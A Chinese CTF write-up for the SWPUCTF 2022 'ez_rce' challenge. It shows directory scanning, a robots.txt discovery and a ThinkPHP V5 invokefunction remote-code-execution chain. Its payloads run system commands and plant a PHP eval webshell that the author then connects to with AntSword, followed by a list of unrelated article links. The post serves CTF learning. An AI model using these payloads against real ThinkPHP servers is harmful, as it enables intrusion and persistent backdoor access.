当前位置：首页 > news >正文

[SWPUCTF 2022 新生赛]ez_rce

news 2025/9/16 9:21:32

打开题目就在线环境，发现只有一句话：真的什么都没有吗
F12查看控制台和源代码也没发现任何信息，然后用虚拟机里面的dirsearch扫一下这个网站就能得到：
在这里插入图片描述
然后这里扫出来的结果查看的直接就是robots.txt,然后就能看到：

然后访问：/NSS/index.php/：

这里直接搜索ThingkPHP V5就能得到这个漏洞复现的方法，我就是根据搜索到的帖子的漏洞复现方法跟着做的。

payload:?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

在这里插入图片描述

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

在这里插入图片描述
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>（将php代码写入shell.php）

在这里插入图片描述
再访问/NSS/shell.php

然后再
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[1]);?>（删除/shell.php替换）

在这里插入图片描述
最后蚁剑连接，网址：http://node5.anna.nssctf.cn:22775/NSS/shell.php
密码为1
最后flag的路径为：/nss/ctf/flag

http://www.lryc.cn/news/542850.html

相关文章：

递归、搜索与回溯算法 —— 名词解析

【docker】docker swarm lock和unlock的区别，以及旧节点重启的隐患

Grafana使用日志5--如何重置Grafana密码

ELK搭建初入

JVM 高级面试题及答案整理，最新面试题

第9章:LangChain结构化输出-示例5(基于大模型如何精确匹配POJO的字段)

ref和reactive的区别 Vue3

基于MATLAB的OFDM通信系统仿真设计

地铁站内导航系统：基于蓝牙Beacon与AR技术的动态路径规划技术深度剖析

JS复习练习题目、完整nodejs项目以及Commons、Es

Linux：理解O(1)调度算法的设计精髓

[C++][cmake]使用C++部署yolov12目标检测的tensorrt模型支持图片视频推理windows测试通过

Uppy - 免费开源、功能强大的新一代 web 文件上传组件，支持集成到 Vue 项目

【游戏——BFS+分层图】

SSL 证书是 SSL 协议实现安全通信的必要组成部分

Spring 源码硬核解析系列专题（七）：Spring Boot 与 Spring Cloud 的微服务源码解析

嵌入式开发：傅里叶变换（5）：STM32和Matlab联调验证FFT

C# 根据Ollama+DeepSeekR1开发本地AI辅助办公助手

洛谷 P8705：[蓝桥杯 2020 省 B1] 填空题之“试题 E ：矩阵” ← 卡特兰数

我的AI工具箱Tauri版-FluxCharacterGeneration参考图像生成人像手办（Flux 版）

DeepSeek开源周Day2：DeepEP - 专为 MoE 模型设计的超高效 GPU 通信库

51单片机-串口通信编程

python实现基于文心一言大模型的sql小工具

deepseek 导出导入模型(docker)

前言：什么是大模型微调

TCPDF 任意文件读取漏洞：隐藏在 PDF 生成背后的危险

unity学习53：UI的子容器：面板panel

水环境水质在线监测系统解决方案

HBuilder X中，uni-app、js的延时操作及定时器

BigDecimal线上异常解决方案：避免科学计数法输出的坑